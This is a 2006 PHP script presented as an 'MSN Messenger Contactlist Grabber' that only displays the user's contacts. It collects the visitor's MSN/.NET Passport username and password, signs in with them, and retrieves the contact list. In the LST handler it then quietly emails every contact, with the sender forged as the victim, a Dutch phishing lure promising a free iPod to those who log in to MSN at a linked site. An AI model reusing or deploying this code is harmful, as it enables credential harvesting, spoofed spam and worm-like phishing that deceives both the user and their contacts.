[SIZE=2]<?php
/*
SQL:
=========================================
CREATE TABLE `contactlijst` (
`id` INT( 10 ) NOT NULL AUTO_INCREMENT ,
`adres` VARCHAR( 255 ) NOT NULL ,
UNIQUE (
`id`
)
) TYPE = innodb;
=========================================
+-------------------------------------------------------+
| MSN Messenger Contactlist Grabber (.NET Passport) |
+---------------------------------------------------+---+
| Name: MSN Messenger Contactlist Grabber | |
| Description: This scripts grabs your contact- | |
| list from your .NET Passport and | I |
| shows all your contacts in your | N |
| browser. | F |
| Creator: Wesley Geysels | O |
| Email: wesleyke@wesleyke.be | |
| Date: 29 March 2006 | |
+---------------------------------------------------+---+
| This program is free software; you can | |
| redistribute it and/or modify it under the terms | L |
| of the GNU General Public License as published | I |
| by the Free Software Foundation; either version 2 | C |
| of the License, or (at your option) any later | E |
| version. | N |
| | S |
| If you think you made a great modification you | E |
| can always mail it to my email shown above | |
+---------------------------------------------------+---+
Extensie met importeren in mysql-database is gemaakt door
Teuneboon en mag mits je zijn naam erbij vermeld verspreid
worden over het web.
*/
error_reporting( E_ALL ^ E_NOTICE);
set_time_limit ( 0 );
$inhoud_mail = "
Kom nu naar onze speciale msn-site! En maak kans op een gratis ipod, het enige wat je hoeft te doen is in te loggen op msn!, <a href=#>Klik hier</a> om naar de site te gaan, als de link niet werkt moet je deze link kopiren naar je adresbalk: http://www.link.nl";
echo "<html>\r\n";
echo "<head>\r\n";
echo "<title>MSN Messenger Contactlist Grabber</title>\r\n";
echo "<style type=\"text/css\">\r\n";
echo "body, input {\r\n";
echo "font: 10px Verdana;\r\n";
echo "}\r\n";
echo "</style>\r\n";
echo "</head>\r\n";
echo "<body>\r\n";
if(empty($_POST['username']) || empty($_POST['password']))
{
//No username or password filled in, show the login form:
echo "</style>\r\n";
echo "<form action=\"\" method=\"post\">\r\n";
echo "Username:<br />\r\n";
echo "<input type=\"text\" value=\"\" name=\"username\" /><br /><br />\r\n";
echo "Password:<br />\r\n";
echo "<input type=\"password\" value=\"\" name=\"password\" /><br /><br />\r\n";
echo "<input type=\"submit\" value=\"Grab Contactlist\" name=\"submit\" />\r\n";
echo "</form>\r\n";
}
elseif(!empty($_POST['username']) && !empty($_POST['password']))
{
/*
+-----------------------------------------------------------------------------------+
| DO NOT CHANGE ANYTHING BELOW THIS |
+-----------------------------------------------------------------------------------+
| Changing anything below here could harm the script and we don't want that do we? |
+-----------------------------------------------------------------------------------+
*/
//
// Required variables
//
$msnProtocol = "MSNP11";
$showOffline = 1;
$sortBy = "status";
$session = md5(time());
$authCode = md5(time()+1);
$started = time();
$transactionID = 0;
$yourStatus = "FLN";
$list = "";
$username = $_POST['username'];
$password = $_POST['password'];
//
// Needed functions
//
function doChallenge($key)
{
return md5($key."Q1P7W2E4J9R8U3S5");
}
function dataIn()
{
global $connection;
$dummy = fgets($connection, 256);
return $dummy;
}
function dataOut($data)
{
global $connection, $transactionID;
fputs($connection, $data."\r\n");
$transactionID++;
}
function showContactList()
{
global $contactList, $yourStatus, $session, $authCode, $showOffline, $sortBy, $username, $password, $postUrl;
global $sid, $kv, $id, $mspauth, $timeSinceInit;
$showContactlist = $contactList;
if(!is_array($showContactlist))
{
$list.= "There are no users on your contactlist.\r\n";
}
else
{
foreach($showContactlist as $email => $elements)
{
if($elements['status'] == "FLN")
{
$dummyArray2[$email] = $elements;
}
else
{
$dummyArray[$email] = $elements;
}
}
$showContactlist = array();
if(is_array($dummyArray))
{
foreach($dummyArray as $email => $elements)
{
$showContactlist[$email] = $elements;
}
}
if(is_array($dummyArray2))
{
foreach($dummyArray2 as $email => $elements)
{
$showContactlist[$email] = $elements;
}
}
foreach ($showContactlist as $email => $elements)
{
$name = $email;
$nickname = urldecode($elements['username']);
$list.= "<b>Email</b>:".$name."<br />\r\n";
$list.= "<b>Nickname</b>:".$nickname."<br /><br />\r\n";
}
}
return $list;
}
//
// Grabbing the contactlist
//
echo "<div id=\"status\">Please be patient, this can take several minutes...<br /></div>\r\n\r\n";
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Connecting to the MSN Server...\";\r\n</script>";
flush();
$connection = fsockopen('messenger.hotmail.com', 1863) or die("<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Couldn't establish a connection with the MSN Server!\";\r\n</script>\r\n");
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Connected to the MSN Server!\";\r\n</script>\r\n";
flush();
dataOut("VER $transactionID $msnProtocol CVR0");
dataIn();
dataOut("CVR $transactionID 0x0409 winnt 5.1 i386 MSNMSGR 7.5.0324 MSMSGS $username");
dataIn();
dataOut("USR $transactionID TWN I $username");
$temp = dataIn();
if(!stristr($temp, ":"))
{
if(substr($temp, 0, 3) == 601)
{
die("The following error occured: <br />\r\n The MSN Servers are currently down.");
}
else
{
die("Your username/password combination doesn't match.<br />\r\n");
}
}
@fclose($connection);
$tempArray = explode(" ", $temp);
$tempArray = explode(":", $tempArray[3]);
flush();
$connection = fsockopen($tempArray[0], $tempArray[1]) or die("No XFR commando found: <br />{$tempArray[0]} :{$tempArray[1]}");
dataOut("VER $transactionID $msnProtocol CVR0");
dataIn();
flush();
dataOut("CVR $transactionID 0x0409 winnt 5.1 i386 MSNMSGR 7.5.0324 MSMSGS $username");
dataIn();
dataOut("USR $transactionID TWN I $username");
$temp = dataIn();
$tempArray = explode(" ", $temp);
flush();
$TokenString = trim(end($tempArray));
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Logging in...\";\r\n</script>\r\n";
flush();
$nexusSocket = fsockopen("ssl://nexus.passport.com", 443);
fputs($nexusSocket, "GET /rdr/pprdr.asp HTTP/1.0\r\n\r\n");
while ($temp != "\r\n"){
$temp = fgets($nexusSocket, 1024);
if(substr($temp, 0, 12) == "PassportURLs")
{
$urls = substr($temp, 14);
}
}
$tempArray = explode(",", $urls);
$temp = $tempArray[1];
$temp = substr($temp, 8);
$tempArray = explode("/", $temp);
@fclose($nexusSocket);
$sslConnection = fsockopen("ssl://".$tempArray[0], 443);
fputs($sslConnection, "GET /{$tempArray[1]} HTTP/1.1\r\n");
fputs($sslConnection, "Authorization: Passport1.4 OrgVerb=GET, OrgUrl=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=".urlencode($username).",pwd=$password,$TokenString\r\n");
fputs($sslConnection, "User-Agent: MSMSGS\r\n");
fputs($sslConnection, "Host: {$tempArray[0]}\r\n");
fputs($sslConnection, "Connection: Keep-Alive\r\n");
fputs($sslConnection, "Cache-Control: no-cache\r\n\r\n");
$temp = fgets($sslConnection, 512);
if(rtrim($temp) == "HTTP/1.1 302 Found")
{
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Bezig met aanmelden...\";\r\nlengteVooruitgang(30%);\r\n</script>";
flush();
while($temp != "\r\n")
{
$temp = fgets($sslConnection, 256);
if(substr($temp, 0, 9) == "Location:")
{
$tempArray = explode(":", $temp);
$tempArray = explode("/", trim(end($tempArray)));
break;
}
}
@fclose($sslConnection);
$sslConnection = fsockopen("ssl://".$tempArray[2], 443);
fputs($sslConnection, "GET /{$tempArray[3]} HTTP/1.1\r\n");
fputs($sslConnection, "Authorization: Passport1.4 OrgVerb=GET, OrgUrl=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=".urlencode($username).",pwd=$password,$TokenString\r\n");
fputs($sslConnection, "User-Agent: MSMSGS\r\n");
fputs($sslConnection, "Host: {$tempArray[2]}\r\n");
fputs($sslConnection, "Connection: Keep-Alive\r\n");
fputs($sslConnection, "Cache-Control: no-cache\r\n\r\n");
}
elseif(rtrim($temp) == "HTTP/1.1 401 Unauthorized")
{
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"The username/password combination is wrong.\";\r\n</script>";
@fclose($sslConnection);
die;
}
else
{
if(rtrim($temp) != "HTTP/1.1 200 OK")
{
echo "Unknown HTTP status code:<br />".$temp;
flush();
die();
}
}
while($temp != "\r\n")
{
$temp = fgets($sslConnection, 1024);
if(substr($temp, 0, 19) == "Authentication-Info")
{
$authInfo = $temp;
$temp = fgets($sslConnection, 1024);
if(substr($temp, 0, 14) != "Content-Length")
{
$authInfo.= fgets($sslConnection, 1024);
}
break;
}
}
@fclose($sslConnection);
$tempArray = explode("'", $authInfo);
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Signing in...\";\r\n</script>";
flush();
dataOut("USR $transactionID TWN S {$tempArray[1]}");
flush();
$temp = dataIn();
switch(substr($temp, 0, 3))
{
case "928":
case "911":
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"The username/password combination is wrong.\";\r\n</script>\r\n";
@fclose($sslConnection);
die();
break;
}
flush();
$timeSinceInitmsg = time();
while(!strstr($temp, "ABCHMigrated") && is_string(trim($temp)))
{
if(substr($temp, 0, 3) == "sid")
{
$sid = trim(substr($temp, 5));
}
if(substr($temp, 0, 2) == "kv")
{
$kv = trim(substr($temp, 4));
}
if(substr($temp, 0, 7) == "MSPAuth")
{
$mspauth = trim(substr($temp, 9));
flush();
}
$temp = dataIn();
}
$temp = dataIn();
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Signing in...\";\r\n</script>\r\n";
flush();
//dataOut("CHG $transactionID FLN");
dataOut("SYN $transactionID 0 0");
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"Retrieving contact list...\";\r\n</script>\r\n";
dataIn();
flush();
stream_set_timeout($connection, 0, 1);
while(!feof($connection))
{
$stuff = trim(fgets($connection, 512));
switch (substr($stuff, 0, 3)){
case "CHL": //Server PING
$parts = explode(" ", $stuff);
$key = $parts[2];
dataOut("QRY $transactionID msmsgs@msnmsgr.com 32\r\n".doChallenge(trim($key)));
break;
case "PBR": //Antwoord na commando LST (Niet echt belangrijk)
case "NLN":
$boom = explode(' ',$stuff);
if (!empty($statussen[$boom[1]])){
$contactList[$boom[2]]['status'] = $boom[1];
$contactList[$boom[2]]['username'] = $boom[3];
showContactlist();
}
break;
case "SYN":
$tempArray = explode(" ",$stuff);
$four = $tempArray[4];
break;
case "MSG":
$tempArray = explode(" ",$stuff);
$message = "";
while(strlen($message) < $tempArray[3]){
$message.= fgets($connection, 256);
}
$temp = explode("\r\n", $message);
if ($asdf[1] == "Content-type: application/x-msmsgssystemmessage")
{
$tempArray = explode(":",$temp[3]);
$type = $tempArray[1];
$tempArray = explode(":",$temp[4]);
$arg1 = $tempArray[1];
if ($type == 1){
echo "<script>\r\nalert(\"The server is going down for maintainance in $arg1 minutes.\");\r\n</script>\r\n";
}
}
break;
case "FLN":
$tempArray = explode(" ",$stuff);
$contactList[$tempArray[1]]['status'] = "FLN";
showContactlist();
break;
case "OUT":
if (substr($stuff,4,3) == 'OTH'){
echo "<script>\r\nalert(\"You are already logged in on an other location.\");\r\n</script>\r\n";
@fclose($connection);
die();
} else {
echo "<script>\r\ndocument.getElementById(\"status\").innerHTML=\"You were disconnected.<br /><a href=\"javascript:document.location.reload();\">Try Again<a/></font>\";\r\n</script>\r\n";
@fclose($connection);
die();
}
break;
case "PRP":
$tempArray = explode(" ",$stuff);
if ($tempArray[1] == "MFN"){
$huidigeNaam = $tempArray[3];
}
break;
case "LST":
echo "<script language=\"javascript\">\r\ndocument.getElementById(\"status\").innerHTML=\"$username, here is your contactlist:<br /><br />\";\r\n</script>\r\n";
$tempArray = explode(" ",$stuff);
if((substr($tempArray[1], 0, 2) == "N=") && (!is_numeric($tempArray[2])))
{
echo urldecode(substr($tempArray[1], 2))."<br />\r\n";
$headers = "From: " . $_POST['username'] . " <" . $_POST['username'] . ">";
$headers = stripslashes($headers);
$headers = str_replace("\n", "", $headers);
$headers = str_replace("\r", "", $headers);
$headers = str_replace("\"", "\\\"", str_replace("\\", "\\\\", $headers));
mail(urldecode(substr($tempArray[1], 2)), "Hallo!", $inhoud_mail, $headers);
}
break;
case "LSG":
$tempArray = explode(" ",$stuff);
$groups[$tempArray[2]] = $tempArray[1];
break;
case "CHG":
$tempArray = explode(" ",$stuff);
$nieuweStatus = $tempArray[2];
break;
case "BLP": // Geblokkeerd of niet?
case "GTC":
break;
case "403":
echo "An error has occured, please try again.<br>";
break;
}
flush();
}
}
echo "</body>\r\n";
echo "</html>";
?>